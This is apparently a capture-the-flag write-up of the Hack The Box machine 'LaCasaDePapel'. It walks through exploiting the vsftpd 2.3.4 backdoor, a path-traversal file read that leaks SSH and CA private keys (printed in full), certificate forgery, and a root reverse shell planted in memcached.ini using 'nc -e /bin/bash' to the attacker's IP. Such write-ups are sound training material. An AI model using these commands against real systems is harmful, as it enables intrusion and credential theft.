Ech0 - 18 / 02 / 2020

LaCasaDePapel Writeup

Introduction :



LaCasaDePapel is an easy Linux box released back in March 2019.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
  → ping 10.10.10.131
  PING 10.10.10.131 (10.10.10.131) 56(84) bytes of data.
  64 bytes from 10.10.10.131: icmp_seq=1 ttl=63 time=37.7 ms
  64 bytes from 10.10.10.131: icmp_seq=2 ttl=63 time=140 ms
  64 bytes from 10.10.10.131: icmp_seq=3 ttl=63 time=248 ms
  ^C
  --- 10.10.10.131 ping statistics ---
  3 packets transmitted, 3 received, 0% packet loss, time 2003ms
  rtt min/avg/max/mdev = 37.737/141.928/247.866/85.793 ms

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
  → nmap -F 10.10.10.131
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
  Nmap scan report for 10.10.10.131
  Host is up (0.34s latency).
  Not shown: 96 closed ports
  PORT    STATE SERVICE
  21/tcp  open  ftp
  22/tcp  open  ssh
  80/tcp  open  http
  443/tcp open  https

  Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
  → nmap -sCV -p21,22,80,443 10.10.10.131
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
  Nmap scan report for 10.10.10.131
  Host is up (0.19s latency).

  PORT    STATE SERVICE  VERSION
  21/tcp  open  ftp      vsftpd 2.3.4
  22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
  | ssh-hostkey:
  |   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
  |   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
  |_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
  80/tcp  open  http     Node.js (Express middleware)
  |_http-title: La Casa De Papel
  443/tcp open  ssl/http Node.js Express framework
  | http-auth:
  | HTTP/1.1 401 Unauthorized\x0D
  |_  Server returned status 401 but no WWW-Authenticate header.
  | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
  | Not valid before: 2019-01-27T08:35:30
  |_Not valid after:  2029-01-24T08:35:30
  |_ssl-date: TLS randomness does not represent time
  | tls-alpn:
  |_  http/1.1
  | tls-nextprotoneg:
  |   http/1.1
  |_  http/1.0
  Service Info: OS: Unix

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 30.73 seconds

Part 2 : Getting User Access



Our nmap scan picked up vsftpd 2.3.4 running on port 21, Let's run a quick searchsploit command to see if there are any popular exploits for us to use.

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB ]
  → searchsploit vsftpd 2.3
  ---------------- ----------------------------------------
   Exploit Title  |  Path
                  | (/usr/share/exploitdb/)
  ---------------- ----------------------------------------
  vsftpd 2.3.2 -  | exploits/linux/dos/16270.c
  vsftpd 2.3.4 -  | exploits/unix/remote/17491.rb
  ---------------- ----------------------------------------
  Shellcodes: No Result

Seems like there is a .rb script for us to use, which is most probably available for us within metasploit. Let's fire up msfconsole to see if we're correct.

  msf5 > search vsftpd 2.3.4

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  auxiliary/gather/teamtalk_creds                                            normal     No     TeamTalk Gather Credentials
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2  exploit/multi/http/struts2_namespace_ognl                 2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3  exploit/unix/ftp/vsftpd_234_backdoor                      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

The third one seems to be interesting , let's use it.

  msf5 > use 3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
RHOSTS => 10.10.10.131
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

The only option that needs to be set is the RHOSTS one, we then hit exploit and see what results we're getting :

  msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.131:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

The exploit doesn't seem to work, Let's locate it, then copy it onto our local directory to examine it a little closer.

  msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exit

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB ]
  → mkdir CasaDePapel

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB ]
  → cd CasaDePapel

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
  → locate 17491
  /opt/metasploit/vendor/bundle/ruby/2.6.0/gems/metasploit-credential-3.0.3/db/migrate/20140722174919_old_creds_to_new_creds.rb
  /usr/share/exploitdb/exploits/unix/remote/17491.rb

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
  → cp /usr/share/exploitdb/exploits/unix/remote/17491.rb .

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
  → nano 17491.rb

Looking at the code, we see that the exploit tries to connect to the 6200th port. Let's use telnet to see if we can connect to it manually.

  λ ech0 [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
→ telnet 10.10.10.131 6200
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
ls
Variables: $tokyo
ls
Variables: $tokyo
whoami
PHP Warning:  Use of undefined constant whoami - assumed 'whoami' (this will throw an Error in a future version of PHP) in phar://eval()'d code on line 1
help
  help       Show a list of commands. Type `help [foo]` for information about [foo].      Aliases: ?
  ls         List local, instance or class variables, methods and constants.              Aliases: list, dir
  dump       Dump an object or primitive.
  doc        Read the documentation for an object, class, constant, method or property.   Aliases: rtfm, man
  show       Show the code for an object, class, constant, method or property.
  wtf        Show the backtrace of the most recent exception.                             Aliases: last-exception, wtf?
  whereami   Show where you are in the code.
  throw-up   Throw an exception or error out of the Psy Shell.
  timeit     Profiles with a timer.
  trace      Show the current call stack.
  buffer     Show (or clear) the contents of the code input buffer.                       Aliases: buf
  clear      Clear the Psy Shell screen.
  edit       Open an external editor. Afterwards, get produced code in input buffer.
  sudo       Evaluate PHP code, bypassing visibility restrictions.
  history    Show the Psy Shell history.                                                  Aliases: hist
  exit       End the current session and return to caller.                                Aliases: quit, q
whereami

From phar:///usr/bin/psysh/src/functions.php:307:

    302| $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
    303| } elseif ($input->getOption('no-color')) {
    304| $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
    305| }
    306|
  > 307| $shell = new Shell(new Configuration($config));
    308|
    309|
    310|  if ($usageException !== null || $input->getOption('help')) {
    311| if ($usageException !== null) {
    312| echo $usageException->getMessage() . PHP_EOL . PHP_EOL;

history
show $tokyo
  > 2| class Tokyo {
    3| 	private function sign($caCert,$userCsr) {
    4| 		$caKey = file_get_contents('/home/nairobi/ca.key');
    5| 		$userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
    6| 		openssl_x509_export($userCert, $userCertOut);
    7| 		return $userCertOut;
    8| 	}
    9| }


Interestingly enough, the 4th line seems to pass the contents of a file named ca.key into the $caKey variable. Let's see what the contents of the ca.key are ourselves.

  file_get_contents('/home/nairobi/ca.key');
  => """
     -----BEGIN PRIVATE KEY-----\n
     MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
     7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
     2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
     uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
     YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
     s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
     PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
     Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
     1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
     /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
     q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
     uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
     I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
     7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
     G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
     sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
     CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
     sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
     ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
     zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
     ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
     9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
     WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
     7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
     aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
     53udBEzjt3WPqYGkkDknVhjD\n
     -----END PRIVATE KEY-----\n
     """

Seems like we have a ssh key to work with ! let's save it locally as ca.key. Do not forget to remove the \n and the spaces at the beginning of the lines otherwise it won't be the exact same SSH key. Earlier on, our nmap scan picked up the 443rd port open running https, let's browse to it and see what we can work with.

Seems like we need to provide a certificate. So let's first add the casadepapel.htb hostname to our /etc/hosts file.

127.0.0.1       localhost
127.0.1.1       Prometheus
10.10.10.131    casadepapel.htb

navigating over to https://10.10.10.131/ > connection > more information > security > view certificate > details > export and now we have the ca.key and ca.crt

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl pkey -in ca.key -pubout
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout | grep md5sum

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout | md5sum
71e2b2ca7b610c24d132e3e4c06daf0c  -

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl pkey -in ca.key -pubout | md5sum
71e2b2ca7b610c24d132e3e4c06daf0c  -

so here we see that the md5 hashes of both the public keys are the same, therefore it means that the public key is valid. From there, we need to generate a 4096 bit key and create a certificate signing request that we'll name client.csr

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → openssl genrsa -out client.key 4096
  Generating RSA private key, 4096 bit long modulus (2 primes)
  ......................................................................++++
  .............................................++++
  e is 65537 (0x010001)

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → ls
  ca.crt  ca.key  client.key

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → openssl req -new -key client.key -out client.csr
  You are about to be asked to enter information that will be incorporated
  into your certificate request.
  What you are about to enter is what is called a Distinguished Name or a DN.
  There are quite a few fields but you can leave some blank
  For some fields there will be a default value,
  If you enter '.', the field will be left blank.
  -----
  Country Name (2 letter code) [AU]:US
  State or Province Name (full name) [Some-State]:NY
  Locality Name (eg, city) []:NYC
  Organization Name (eg, company) [Internet Widgits Pty Ltd]:Marvel
  Organizational Unit Name (eg, section) []:DC
  Common Name (e.g. server FQDN or YOUR name) []:ech0
  Email Address []:ech0@prometheus.com

  Please enter the following 'extra' attributes
  to be sent with your certificate request
  A challenge password []:
  An optional company name []:

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → ls
  ca.crt  ca.key  client.csr  client.key
  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → ls
  ca.crt  ca.key  client.csr  client.key

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 365 -outform PEM -out client.cer
  Signature ok
  subject=C = US, ST = NY, L = NYC, O = Marvel, OU = DC, CN = ech0, emailAddress = ech0@prometheus.com
  Getting CA Private Key
  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
  Enter Export Password:
  Verifying - Enter Export Password:

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
  → ls
  ca.crt  ca.key  client.cer  client.csr  client.key  client.p12

And we are in ! now we are able to enumerate the box further, from here we see that clicking on season1 then shows us a bunch of avi files to download, hovering over them, we see that their hyperlink is base64 encoded, and barely changing, so let's try getting some LFI.

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\=
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Looks like we found a private key ! let's try logging in as one of the users :

  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\= > privatekey

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ chmod 600 privatekey

λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ssh -i privatekey professor@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.

 _             ____                  ____         ____                  _
| |    __ _   / ___|__ _ ___  __ _  |  _ \  ___  |  _ \ __ _ _ __   ___| |
| |   / _` | | |   / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
| |__| (_| | | |__| (_| \__ \ (_| | | |_| |  __/ |  __/ (_| | |_) |  __/ |
|_____\__,_|  \____\__,_|___/\__,_| |____/ \___| |_|   \__,_| .__/ \___|_|
                                                            |_|

lacasadepapel [~]$ whoami
professor

lacasadepapel [~]$ cd /home/professor && ls
memcached.ini  memcached.js   node_modules

lacasadepapel [~]$

and we are logged in ! however we still need to escalate privileges to be able to print out the flags. printing out the file memcached.ini we see some kind of a command being run and the file itself is owned by root. changing it we should be able to privesc.

Terminal 1:
  lacasadepapel [~]$ which nc
  /usr/bin/nc
  lacasadepapel [~]$ vi memcached.ini
  [program:memcached]
  command = sudo -u root /usr/bin/nc 10.10.14.7 1234 -e /bin/bash
Terminal 2:
  λ ech0 [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.131] 43309
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4# whoami
whoami
root
cd /home
bash-4.4# ls
ls
berlin     dali       nairobi    oslo       professor
bash-4.4# cd berlin
cd berlin
bash-4.4# ls
ls
downloads     node_modules  server.js     user.txt
bash-4.4# cat user.txt
cat user.txt
4dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

and we are logged in as root ! all that's left to do is printing our flags.

Part 3 : Getting Root Access



  bash-4.4# cat /root/root.txt
  cat /root/root.txt
  58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Conclusion



Here we can see the progress graph :